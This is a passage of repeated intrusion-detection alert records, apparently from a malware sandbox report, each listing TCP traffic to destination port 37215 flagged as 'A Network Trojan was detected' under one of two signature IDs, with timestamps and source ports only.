                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868617
                SID:2829579
                Source Port:56922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713767
                SID:2829579
                Source Port:53794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.999152
                SID:2835222
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874601
                SID:2829579
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840176
                SID:2835222
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225546
                SID:2829579
                Source Port:50994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968372
                SID:2829579
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265909
                SID:2835222
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281952
                SID:2835222
                Source Port:42792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843876
                SID:2829579
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918423
                SID:2829579
                Source Port:34868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899269
                SID:2835222
                Source Port:58970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233332
                SID:2829579
                Source Port:58824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926376
                SID:2829579
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883769
                SID:2835222
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902391
                SID:2829579
                Source Port:39530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781847
                SID:2835222
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075287
                SID:2829579
                Source Port:42024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024507
                SID:2829579
                Source Port:53326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421427
                SID:2829579
                Source Port:33430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093178
                SID:2835222
                Source Port:42140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520365
                SID:2829579
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507396
                SID:2835222
                Source Port:54846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125290
                SID:2835222
                Source Port:35656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520045
                SID:2835222
                Source Port:56228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040638
                SID:2835222
                Source Port:46044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848936
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784284
                SID:2835222
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811772
                SID:2829579
                Source Port:44930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207974
                SID:2835222
                Source Port:56488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788344
                SID:2829579
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968299
                SID:2829579
                Source Port:33516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224439
                SID:2829579
                Source Port:53850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000790
                SID:2835222
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848744
                SID:2835222
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111232
                SID:2829579
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667281
                SID:2835222
                Source Port:38188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558057
                SID:2835222
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816959
                SID:2835222
                Source Port:57344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537218
                SID:2829579
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782784
                SID:2829579
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960326
                SID:2829579
                Source Port:52084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854700
                SID:2835222
                Source Port:53432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385446
                SID:2835222
                Source Port:37826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648435
                SID:2835222
                Source Port:44210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643315
                SID:2835222
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275456
                SID:2835222
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369949
                SID:2829579
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2835222
                Source Port:40820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683786
                SID:2829579
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162848
                SID:2829579
                Source Port:60236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807204
                SID:2835222
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141283
                SID:2835222
                Source Port:59512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830757
                SID:2829579
                Source Port:35746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987137
                SID:2829579
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434968
                SID:2829579
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521271
                SID:2835222
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910362
                SID:2829579
                Source Port:60112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110862
                SID:2835222
                Source Port:48378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110485
                SID:2835222
                Source Port:40530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209950
                SID:2829579
                Source Port:47256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854130
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519756
                SID:2835222
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968778
                SID:2835222
                Source Port:38628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215764
                SID:2835222
                Source Port:43006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389069
                SID:2835222
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738574
                SID:2829579
                Source Port:58964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438738
                SID:2835222
                Source Port:42202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521942
                SID:2835222
                Source Port:49866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584050
                SID:2829579
                Source Port:32880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284085
                SID:2835222
                Source Port:39604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440696
                SID:2829579
                Source Port:33624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223938
                SID:2835222
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562022
                SID:2835222
                Source Port:46904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166950
                SID:2835222
                Source Port:50174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726194
                SID:2835222
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976262
                SID:2829579
                Source Port:40866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763594
                SID:2829579
                Source Port:47958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811723
                SID:2835222
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814311
                SID:2829579
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913747
                SID:2835222
                Source Port:54996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660158
                SID:2829579
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736959
                SID:2835222
                Source Port:60058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325896
                SID:2835222
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239685
                SID:2835222
                Source Port:45396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417153
                SID:2835222
                Source Port:36208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765116
                SID:2835222
                Source Port:55952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629771
                SID:2829579
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364805
                SID:2829579
                Source Port:34010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010971
                SID:2829579
                Source Port:58816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212222
                SID:2835222
                Source Port:42382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088016
                SID:2829579
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224642
                SID:2835222
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272447
                SID:2829579
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226772
                SID:2829579
                Source Port:37632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584076
                SID:2829579
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438785
                SID:2829579
                Source Port:40360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858221
                SID:2829579
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961111
                SID:2835222
                Source Port:43560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942904
                SID:2829579
                Source Port:54052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282279
                SID:2835222
                Source Port:35412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087975
                SID:2829579
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885771
                SID:2835222
                Source Port:57026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958894
                SID:2829579
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840264
                SID:2835222
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558039
                SID:2829579
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784370
                SID:2835222
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811905
                SID:2835222
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862721
                SID:2835222
                Source Port:56274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869657
                SID:2835222
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418017
                SID:2829579
                Source Port:48170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597057
                SID:2835222
                Source Port:37956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843222
                SID:2829579
                Source Port:60504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659836
                SID:2829579
                Source Port:34838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039189
                SID:2829579
                Source Port:32832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519642
                SID:2829579
                Source Port:49612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574546
                SID:2829579
                Source Port:51796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718074
                SID:2829579
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364230
                SID:2835222
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681891
                SID:2829579
                Source Port:41436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820335
                SID:2835222
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502113
                SID:2835222
                Source Port:34216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519813
                SID:2829579
                Source Port:53846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726394
                SID:2829579
                Source Port:51182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645102
                SID:2829579
                Source Port:43450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132547
                SID:2829579
                Source Port:58042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944737
                SID:2835222
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961863
                SID:2835222
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660224
                SID:2835222
                Source Port:53438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276830
                SID:2835222
                Source Port:53374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436472
                SID:2829579
                Source Port:52424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873268
                SID:2829579
                Source Port:35586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265514
                SID:2829579
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073854
                SID:2835222
                Source Port:50904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763020
                SID:2829579
                Source Port:52796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605223
                SID:2829579
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210699
                SID:2835222
                Source Port:39068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660237
                SID:2829579
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101435
                SID:2829579
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074518
                SID:2835222
                Source Port:34736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702237
                SID:2829579
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617136
                SID:2829579
                Source Port:49594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856235
                SID:2835222
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333440
                SID:2835222
                Source Port:56928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263685
                SID:2835222
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814347
                SID:2835222
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381336
                SID:2829579
                Source Port:33268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782276
                SID:2835222
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897026
                SID:2829579
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845274
                SID:2829579
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160202
                SID:2835222
                Source Port:59824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962797
                SID:2829579
                Source Port:37284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854183
                SID:2829579
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584096
                SID:2835222
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043894
                SID:2829579
                Source Port:56820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227739
                SID:2835222
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160385
                SID:2835222
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805737
                SID:2829579
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334495
                SID:2829579
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653720
                SID:2835222
                Source Port:56222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628072
                SID:2829579
                Source Port:40030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440722
                SID:2835222
                Source Port:52998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371579
                SID:2835222
                Source Port:33724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227765
                SID:2829579
                Source Port:51362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216799
                SID:2829579
                Source Port:46444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287177
                SID:2835222
                Source Port:40472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948863
                SID:2835222
                Source Port:55634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811017
                SID:2829579
                Source Port:50462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842440
                SID:2835222
                Source Port:41442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505447
                SID:2829579
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618017
                SID:2829579
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725376
                SID:2835222
                Source Port:54356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845397
                SID:2835222
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873261
                SID:2835222
                Source Port:59128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963093
                SID:2829579
                Source Port:39984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022942
                SID:2835222
                Source Port:54012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575041
                SID:2829579
                Source Port:38646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672309
                SID:2835222
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960579
                SID:2829579
                Source Port:51736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841019
                SID:2835222
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286414
                SID:2835222
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473630
                SID:2835222
                Source Port:54590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656045
                SID:2835222
                Source Port:33970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119412
                SID:2829579
                Source Port:51606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654500
                SID:2829579
                Source Port:42180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330543
                SID:2835222
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897315
                SID:2835222
                Source Port:51952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266062
                SID:2835222
                Source Port:41126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652090
                SID:2835222
                Source Port:38360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559116
                SID:2835222
                Source Port:33056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653365
                SID:2835222
                Source Port:48712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281140
                SID:2835222
                Source Port:39398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521001
                SID:2835222
                Source Port:49802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667880
                SID:2829579
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536129
                SID:2835222
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675295
                SID:2835222
                Source Port:48400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765760
                SID:2835222
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
